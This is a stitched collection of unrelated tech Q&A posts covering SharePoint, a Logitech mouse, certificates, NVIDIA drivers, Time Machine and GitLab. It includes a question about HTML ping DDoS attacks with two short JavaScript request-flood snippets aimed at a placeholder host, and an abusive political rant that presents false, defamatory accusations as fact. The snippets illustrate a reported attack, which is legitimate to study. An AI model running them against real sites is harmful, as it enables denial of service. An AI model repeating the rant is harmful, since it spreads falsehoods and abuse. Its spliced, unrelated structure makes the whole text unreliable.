SharePoint 2016 People picker error “Sorry, we’re having trouble reaching the server”

My users face an error on SharePoint 2016 when they try to add more than 15 users while sharing a file or folder. However, the error happens intermittently, with different results on different network connections. I have extended the timeout from the default 25 s to 60 s. After that, the issue reoccurred when a user was adding names in the people picker, left the computer idle for a while, and then came back to continue adding names, at which point he encountered the error message.
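
If it matters, a timeout change like mine is typically applied per web application through the server object model; a minimal PowerShell sketch, assuming that mechanism (the URL is a placeholder):

    # Run from the SharePoint 2016 Management Shell; the URL is a placeholder.
    $wa = Get-SPWebApplication "http://sharepoint.example.com"
    # Raise the people picker's AD search timeout from the default 25 s to 60 s.
    $wa.PeoplePickerSettings.ActiveDirectorySearchTimeout = New-TimeSpan -Seconds 60
    $wa.Update()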

Does network connectivity have anything to do with the people picker retrieving names from AD? Is it normal for the people picker to time out if left idle for some time? How can users avoid this error in the future?

Logitech mouse G300s: the changes in Logitech Gaming SW were not reflected

Problem: changes made in Logitech Gaming SW (e.g. LED color, any button assignment) were not reflected; the mouse still used the original settings.

Solution (in my case): Karabiner-Elements -> Devices -> Modify events from this device -> uncheck "G300s Optical Gaming Mouse (Logitech)", and uncheck "Manipulate LED" too.

Note: I spent 2 hours on this, so I hope it helps somebody else who is using Karabiner-Elements.

(macOS Mojave 10.14, Logitech Gaming Software 9.02.22, Karabiner-Elements 12.2.0)

Why were hyperlink auditing pings used for DDoS attacks and not any other requests?

A few days ago, this news story was published:

Researchers have found that the HTML feature called hyperlink auditing, or pings, is being used to perform DDoS attacks against various sites. This feature is normally used by sites to track link clicks, but is now found to be abused by attackers to send a massive amount of web requests to sites in order to take them offline.
[…]
In new research by Imperva, researchers have found that HTML pings are being utilized by attackers to perform distributed denial of service attacks on various sites.

The article goes on to describe the attack, which basically executed some JS to add a link with a ping attribute and automatically "click" it every second. It continues in the usual way, stating that the attackers are supposed to have "used social engineering and malvertising to direct users to pages hosting these scripts".
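
To make the mechanism concrete, a minimal sketch of what such a script might look like (the target URL is a placeholder, and the real payload surely differs):

    // Build an <a> element whose ping attribute points at the victim.
    // When the link is followed, the browser POSTs to every ping URL.
    setInterval(function () {
      var a = document.createElement('a');
      a.href = '#';                                     // stay on the page
      a.setAttribute('ping', 'https://victim.example/'); // audit ping goes here
      document.body.appendChild(a);
      a.click();                                        // programmatic "click"
      a.remove();
    }, 1000);                                           // once per second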

Strangely, it does not mention the victims, saying only that they were "gaming companies".


The question now is: especially considering they used JS anyway, why didn't they just use any other form of request?

I admit that the usual AJAX requests may have been problematic, as the attacked websites likely do not have CORS headers set, so the requests would have been blocked by the browser for violating the same-origin policy. But CORS does not usually apply to <img> tags, for example… so they could just have used those.
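
The image-based variant would be just as short; a sketch (again with a placeholder URL):

    // Image loads are not blocked by the same-origin policy, so each
    // new Image() fires a cross-origin GET (timestamp defeats caching).
    setInterval(function () {
      new Image().src = 'https://victim.example/?t=' + Date.now();
    }, 1000);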

Why did they choose the ping attribute for this, and is it thus more dangerous than other (common) methods for DDoSing?

How do I tell the difference between a self-signed CA I made for myself for signing scripts and ones that were already there?

Basically my question is: how do I know whether a certificate I find in my Cert:\LocalMachine\My store is self-signed, as opposed to one that was already present when I started using a new computer?

If you do a Get-ChildItem Cert:\LocalMachine\My, it can list many certificates with their Thumbprint and Subject, and you can list all of the members of each by tacking a | % { $_ | Get-Member } onto the end of it.

But which of these members can tell me the difference between a self-signed cert that I created (possibly by mistake) and ones that were already in there, signed by a real certificate authority?
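
For example, would comparing Subject and Issuer be enough? A self-signed certificate is its own issuer, so a sketch based on that heuristic:

    # Self-signed certs are their own issuer, so Subject equals Issuer;
    # certs issued by a real CA have a different Issuer.
    Get-ChildItem Cert:\LocalMachine\My |
        Where-Object { $_.Subject -eq $_.Issuer } |
        Select-Object Thumbprint, Subject, NotAfter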

(honestly, I just want to sign my personal scripts with my personal certificate, but have only one certificate)

[ Politics ] Open Question : Liberals, were you angry about the Trump tweet showing Joe Biden molesting Joe Biden from behind?

It was humor, something liberals are lacking. Don Lemon and Chris Cuomo actually said the video was "doctored". Really, Chris Cuomo, there aren't two Joe Bidens? No Shitt Sherlock! Lol, what a couple of dummies. Lol at the self-proclaimed "Goddess". Yeah, OK Comrade, fellow Russian troll. Maybe if Biden wasn't drunk on Christmas Eve, he wouldn't have pulled out in front of a truck and killed his wife and child. Look up Hunter. The guy was more corrupt than Paul Manafort; he was up to the same schit in Ukraine. Do the research, Bimbo. And stop being a little cheerleader for drunks like Hillary, Pelosi and Biden. All three are DRUNKS. Hunter is doing his dead brother's widow, while not doing drugs and prostitutes. The guy is a chip off the old corrupt block. Why do you think the Dim Party is trying to get rid of Joe? CORRUPTION! You are so naive it is pathetic.

nvidia-smi: no devices were found

Ubuntu 18.04.02 LTS

Trying to get a 1080Ti recognized by nvidia-smi. Here are the details:

$ lspci -vvv
00:05.0 VGA compatible controller: NVIDIA Corporation GP102 [GeForce GTX 1080 Ti] (rev a1) (prog-if 00 [VGA controller])
        Subsystem: eVga.com. Corp. GP102 [GeForce GTX 1080 Ti]
        Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
        Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
        Latency: 0
        Interrupt: pin A routed to IRQ 16
        Region 0: Memory at c1000000 (32-bit, non-prefetchable) [size=16M]
        Region 1: Memory at d000000000 (64-bit, prefetchable) [size=256M]
        Region 3: Memory at c2000000 (64-bit, prefetchable) [size=32M]
        Region 5: I/O ports at 2080 [size=128]
        [virtual] Expansion ROM at 000c0000 [disabled] [size=128K]
        Capabilities: <access denied>
        Kernel driver in use: nvidia
        Kernel modules: nvidiafb, nouveau, nvidia_drm, nvidia

$ dmesg | grep NVRM
[    4.753635] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  418.56  Fri Mar 15 12:59:26 CDT 2019
[   35.526828] NVRM: RmInitAdapter failed! (0x24:0x65:1070)
[   35.527088] NVRM: rm_init_adapter failed for device bearing minor number 0
[  632.733434] NVRM: RmInitAdapter failed! (0x24:0x65:1070)
[  632.733868] NVRM: rm_init_adapter failed for device bearing minor number 0

$ dmesg | grep nvidia
[    4.616629] nvidia: loading out-of-tree module taints kernel.
[    4.616637] nvidia: module license 'NVIDIA' taints kernel.
[    4.628619] nvidia: module verification failed: signature and/or required key missing - tainting kernel
[    4.649214] nvidia-nvlink: Nvlink Core is being initialized, major device number 241
[    4.649632] nvidia 0000:00:05.0: can't derive routing for PCI INT A
[    4.649634] nvidia 0000:00:05.0: PCI INT A: no GSI
[    4.649743] nvidia 0000:00:05.0: vgaarb: changed VGA decodes: olddecodes=io+mem,decodes=none:owns=io+mem
[    4.766013] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  418.56  Fri Mar 15 12:32:40 CDT 2019
[    4.767330] [drm] [nvidia-drm] [GPU ID 0x00000005] Loading driver
[    4.767331] [drm] Initialized nvidia-drm 0.0.0 20160202 for 0000:00:05.0 on minor 0
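
For completeness, these are the generic checks I plan to run next (standard commands; nothing here is specific to this failure mode):

$ lsmod | grep nvidia          # confirm the kernel modules are loaded
$ ls -l /dev/nvidia*           # check whether the device nodes were created
$ sudo dmesg | grep -i xid     # look for GPU fault (Xid) reports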

Why were my files backed up again by Time Machine?

My 200 GB music library resides on an SD card that is permanently inserted into my MacBook Pro. The volume is encrypted using FileVault. Time Machine includes that volume when backing up to an external USB disk. This setup has worked very well for the past 1–2 years.

However, today Time Machine decided to back up the entire SD card again (I verified this using BackupLoupe), and it is a complete mystery to me why it did that. The MD5 checksums of both versions are identical, and the permissions also seem identical between the two backed-up versions and the original. My main drive was backed up as usual (i.e. no full backup).

The only actual change I can think of is the upgrade from macOS 10.14.3 to 10.14.4.

Any ideas why these files were backed up again, and how I can investigate this?
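
So far the only investigation I can think of is diffing the two snapshots with the built-in tmutil; a sketch (the snapshot paths are examples, substitute two entries from the listbackups output):

    # List the snapshots on the backup disk
    tmutil listbackups
    # Diff two snapshots to see what Time Machine considered changed
    tmutil compare "/Volumes/TM/Backups.backupdb/MyMac/2019-04-01-120000" \
                   "/Volumes/TM/Backups.backupdb/MyMac/2019-04-02-120000"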

GitLab: You cannot push commits for . You can only push commits that were committed with one of your own verified emails

I am having this weird issue where I cloned a repository with my credentials (my_correct@email.adress), but I cannot push my changes because I always receive this message:

GitLab: You cannot push commits for 'my_wrong@email.adress'. You can only push commits that were committed with one of your own verified emails.

The issue is that when I check both the global and the repository-level user settings, I find my_correct@email.adress:

Global:

git config --global user.email
git config --global user.name

Repository:

git config user.email
git config user.name

What should I do, and what is the reason behind this mystery?
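
My current guess at the mechanism: the author email is baked into each commit at commit time, so the config shown above does not change commits that already exist. A sketch of how I could verify and repair the most recent commit (the address is a placeholder):

    # Show which author/committer emails are actually recorded
    git log --format='%h %ae %ce' -5
    # Fix the identity for this repository going forward
    git config user.email "my_correct@email.adress"
    # Rewrite the last commit's author to the (now correct) identity
    git commit --amend --reset-author --no-edit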